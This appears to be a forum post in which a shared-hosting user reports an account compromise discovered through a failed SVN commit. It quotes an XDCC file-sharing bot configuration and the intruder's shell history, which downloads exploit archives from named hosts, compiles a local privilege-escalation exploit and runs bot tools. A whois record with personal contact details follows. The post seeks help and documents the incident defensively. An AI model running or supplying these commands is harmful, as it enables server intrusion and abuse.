Note: not posting this from my main account.
So this all started when I tried to commit something to one of my subversion repositories, today.
Code:
> svn commit -m "My message."
Sending FILENAME
Transmitting file data .svn: Commit failed (details follow):
svn: MERGE request failed on '/PATH/TO/REPOSITORY/trunk'
svn: Can't move '/home/USERNAME/svn/REPOSITORY/db/transactions/199-1.txn/rev' to '/home/USERNAME/svn/REPOSITORY/db/revs/200': Is a directory
I wasn't really sure why I was getting this error, so I ssh'ed into my server, changed to that directory, and saw the following:
Code:
ls -a ~/svn/REPOSITORY/db/revs/200/
.
..
{various .tar files containing disgusting porn titles and strings like DVDRIP and XVID}
httpd
sql
tmp.pid
tmp.state
tmp.state~
x
Crap. Porn. And an httpd binary. Looks like they are using my account to serve up porno all across the web.
Contents of sql:
Code:
pidfile tmp.pid
#logfile mybot2.log
logstats none
#logrotate weekly
statefile tmp.state
connectionmethod direct
server_join_raw
server_connected_raw
channel_join_raw
server und3rd0g.ma.cx 6667
server und3rd0g.ma.cx 6660
server beast.crabdance.com 6667
server beast.crabdance.com 6660
server beast.servegame.org 6667
server beast.servegame.org 6660
server evengod.gotdns.org 6667
server evengod.gotdns.org 6660
loginname beast
channel #beast-stro -plist 10
channel #beast-xdcc -plist 30
user_nick beast-Dream-sushi
user_realname beastxdcc
user_modes +i
autoignore_exclude *!yarden@*.*
slotsmax 15
queuesize 30
maxtransfersperperson 1
maxqueueditemsperperson 1
filedir /home/USERNAME/svn/REPOSITORY/db/revs/200
restrictlist
restrictprivlist
restrictprivlistmsg Take Your time .. ill list in the channel, go get a beer!
restrictsend
respondtochannelxdcc
respondtochannellist
smallfilebypass 1048
downloadhost *!*@*
transferminspeed 1
creditline Brought to you by Beast-XDCC
adminpass 7fORyvKdK2IAc
adminhost *!~@*.*
adminhost *!@*.*
adminhost *!*@*.*
uploadhost *!*@*
uploaddir /home/USERNAME/svn/REPOSITORY/db/revs/200
uploadmaxsize 0
hideos
notifytime 0
Other files were all binary except for the tmp.pid file which just had a process ID.
At this point, I decided at a whim to check my .bash_history file.
Code:
id
uname -a
uptime
w
cd /tmp
ls
mkdir .a
ls
cd .a
pwpwd
pwd
ls
wget mafioza.net/local1.tar.gz
tar -xzf local1.tar.gz
cd local1
ls
gcc prctlpute.c -o prctlpute
./prctlpute
chmod 777 *
ls
./prctlpute
wget mafioza.net/local.tar.gz
tar -xzf local.tar.gz
cd local
ls
./a
pwd
cd /tmp
rm -fr .a
ls
mkdir .tmp
cd .tmp
ls
cd local
ls
cd ..
ls
cd knb
ls
cat conf
cat aa
ssh
id
wget wget mafija.la/~loco/.unix/redone.tar.gz
tar -xzf redone.tar.gz
ls
cd redone
ls
cat config
./config XentoniX 11180
./config
cd
ls
pwd
ls
./fucj
./**** (censored out. should be obvious from the previous typo.)
ls
cd ..
ls
mkdir .a
cd .a
ls
wget mafioza.net/knb2.tar.gz
tar -xzf knb2.tar.gz
ls
cd knb
ls
cat
cd /tmp/.tmp
ls
cd knb
ls
cd .a
ls
cd knb
ls
rm conf
wget mafioza.net/conf
./knb conf
chmod 777 *
ls
./knb conf
id
ps x
cat /tmp/bdpl
Wow. And guess what? All of those files they downloaded are still available from their server.
Code:
>whois mafioza.net
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: MAFIOZA.NET
Registrar: TUCOWS INC.
Whois Server: whois.opensrs.net
Referral URL: http://domainhelp.tucows.com
Name Server: NS2.AFRAID.ORG
Name Server: NS1.AFRAID.ORG
Status: REGISTRAR-LOCK
EPP Status: clientDeleteProhibited
EPP Status: clientTransferProhibited
EPP Status: clientUpdateProhibited
Updated Date: 22-May-2006
Creation Date: 22-May-2006
Expiration Date: 22-May-2016
>>> Last update of whois database: Tue, 05 Sep 2006 16:41:08 EDT <<<
Registrant:
Eurospin eko d.o.o.
Renski podkraj 65
RENCE, Slovenia 5292
SI
Domain name: MAFIOZA.NET
Administrative Contact:
MihajlovicDraza, KPAJNHAevropskaZajednica martina.bacic@eurospineko.si
Renski podkraj 65
RENCE, Slovenia 5292
SI
+386.41962364
Technical Contact:
Technical support, SiOL dns@siol.net
Cigaletova 15
Ljubljana, 1000
SI
+386.14730000 Fax: +386.14730016
Registration Service Provider:
SiOL d.o.o., tomaz.pernovsek@siol.si
+386 1 473 00 00
Registrar of Record: TUCOWS, INC.
Record last updated on 22-May-2006.
Record expires on 22-May-2016.
Record created on 22-May-2006.
Domain servers in listed order:
NS1.AFRAID.ORG
NS2.AFRAID.ORG
Domain status: clientDeleteProhibited
clientTransferProhibited
clientUpdateProhibited
The files from mafioza.net look to be of the standard buffer-overflow-hack-a-linux-script-kiddie stuff, but I am not too familiar with these things.
Do any of you guys have any ideas? What do you think? I don't think I was password-guessed since my password was over 8 characters long and contained letters of both cases as well as numbers. Regardless, I changed my password as soon as I found out about all of this stuff.
Do you think it could be due to an insecure install of phpBB or Gallery? Almost everything I am running is of the latest version, but occasionally it takes me a couple months to upgrade everything. Or maybe the server I am on was generally hacked and they just started using accounts existing on the machine?
I have alerted Dreamhost about all of this. I'll let you know how they respond.
Top
